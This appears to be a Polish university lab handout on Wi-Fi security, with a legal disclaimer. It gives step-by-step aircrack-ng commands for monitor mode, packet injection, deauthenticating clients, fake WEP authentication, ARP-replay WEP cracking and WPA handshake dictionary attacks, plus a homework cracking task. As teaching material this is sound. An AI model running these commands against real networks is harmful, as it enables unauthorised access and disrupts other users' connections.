# Bezpieczeństwo Systemów Komputerowych

## Ćwiczenia 10: Zabezpieczenia sieci Wi-Fi

### 14 maja 2018 roku

# Disclaimer

Prezentowane treści mają charakter **edukacyjny**.

Prezentacja pokazuje techniki testowania swojej sieci bezprzewodowej.

Wykorzystanie tych technik do siedzi cudzych jest **zabronione**.

Autor dokumentu nie bierze odpowiedzialności za to, w jakim celu wiedza przedstawiona w dokumencie zostanie wykorzystana.

## Artykuł 267 Kodeksu Karnego


> §1. Kto bez uprawnienia uzyskuje dostęp do informacji dla niego nieprzeznaczonej, otwierając zamknięte pismo, podłączając się do sieci telekomunikacyjnej lub przełamując albo omijając elektroniczne, magnetyczne, informatyczne lub inne szczególne jej zabezpieczenie, podlega grzywnie, karze ograniczenia wolności albo **pozbawienia wolności do lat 2**.  
§ 2. Tej samej karze podlega, kto bez uprawnienia uzyskuje dostęp do całości lub części systemu informatycznego.  
§ 3. Tej samej karze podlega, kto w celu uzyskania informacji, do której nie jest uprawniony, zakłada lub posługuje się urządzeniem podsłuchowym, wizualnym albo innym urządzeniem lub oprogramowaniem.

# Uwaga

Do przeprowadzenia ćwiczeń potrzebna jest specjalna karta sieciowa, która pozwala przejść w stan monitorowania.

# Zadanie 1

## Przełączenie karty w tryb monitorowania

```bash
> iwconfig
> sudo ifconfig wlan0 up
> sudo airmon-ng start wlan0
> ifconfig wlan0mon
```

# Zadanie 2

## Badanie sieci w pobliżu

```bash
> sudo airodump-ng wlan0mon
```

# Zadanie 3

## Zmiana kanału

```bash
> sudo ifconfig wlan0mon down
> sudo iwconfig wlan0mon channel 4
> sudo iwconfig wlan0mon
```

# Zadanie 4

## Wstrzykiwanie paczek

```bash
sudo airodump-ng mon0
sudo iwconfig mon0 channel 4
sudo aireplay-ng -9 -e ConnectEverybodyNow -a <MAC AP> mon0
```

# Zadanie 5

## Łamanie zabezpieczeń WEP - sposób pierwszy

- Najpierw sprawdzamy, czy ktoś jest podłączony do punktu dostępowego:
```bash
sudo airodump-ng -c 10 -a --bssid <MAC AP> wlan0mon
```
- Nasłuchujemy komunikację z wybranym AP i zapisujemy ją do pliku:
```bash
sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_1
```
- Teraz czekamy, aż uprawniony użytkownik się zaloguje. Jeżeli nie chcemy czekać, możemy wysłać pakiet rozłączający klienta:
```bash
sudo aireplay-ng -0 5 -a <MAC AP> -c <MAC Klienta> wlan0mon
```
- po tym poleceniu należy sprawdzić, czy w pojawił się plik z rozszerzeniem xor - w tym pliku jest strumień klucza, który będzie nam teraz potrzebny do sfałoszowania uwierzytelnienia:
```bash
sudo aireplay-ng -1 0 -e HackingExercises -y wep_1*.xor -a <MAC AP> -h aa:bb:cc:dd:ee:ff wlan0mon
```
- okazuje się, że jesteśmy podłączeni do AP

## Łamanie zabezpieczeń WEP - sposób drugi

- Podobnie jak wcześniej nasłuchujemy pakiety wymieniane z wybranym AP i zapisujemy je do pliku:
```bash
sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_2
```
- Widać, że przechwyconych pakietów jest mało (a potrzebujemy kilkadziesiąt tysięcy pakietów), trzeba proces przyspieszyć przez wstrzykiwanie pakietów ARP
```bash
sudo aireplay-ng -3 -b <MAC AP> -h <MAC Klienta> wlan0mon
```
- Gdy liczba przechwyconych paczek będzie rosła za wolno, można spróbować zdeautentykować użytkownika, po ponownym podłączeniu wszystko zacznie działać dużo szybciej
- Po chwili okaże się, że możemy spróbować złamać hasło:
```bash
sudo aircrack-ng wep_2*.cap

```

# Zadanie 6

## Łamanie zabezpieczeń WPA

- Tak jak wcześniej zaczynamy od przechwytywania pakietów wymienianych z wybranym AP:
```bash
sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wpa_1
```
- Teraz czekamy na wykonanie 4-way handshake. Możemy to przyspieszyć przez odłączenie użytkownika:
```bash
sudo aireplay-ng -0 5 -a <MAC AP> -c <MAC Klienta> wlan0mon
```
- W terminalu, w którym wyświetlają się informacje o przechwyconych pakietach powinna się pojawić informacja o przechwyconym uścisku dłoni. To oznacza, że już mogę przerwać przechwytywanie pakietów i próbować siłowo złamać hasło:
```bash
sudo aircrack-ng wpa_1-01.cap -w <plik ze słowami> 
```

# Praca domowa

Do pracy domowej dołączony jest plik `cap`, w którym został zarejestrowany poczwórny uścisk dłoni. Twoim zadaniem jest przesłanie archiwum ZIP, w którym będą dwa pliki:
- `psk.txt` - który będzie zawierał złamane hasło
- `solution.txt` - który będzie zawierał opis, w jaki sposób hasło zostało złamane.
SSID sieci, w której nastąpiło złamanie to `HackingExercises`.

Oczywiście nazwa pliku ZIP ma jasno wskazywać na autora rozwiązania.

Należy się oczywiście podpowiedź, jak hało zostało wygenerowane. Hasło zostało wygenerowane w taki sposób, że słowo składa się tylko z liter łacińskich (w sensie, że nie ma literki, która zawiera polskie znaki narodowe) i jest to prawidłowe słowo (w sensie `pawel` nie może być, bo nie jest to prawidłowe słowo w języku polskim). Pierwsza litera została zamieniona na wielką literę, a na końcu słowa dopisano jedną cyfrę dziesiętną.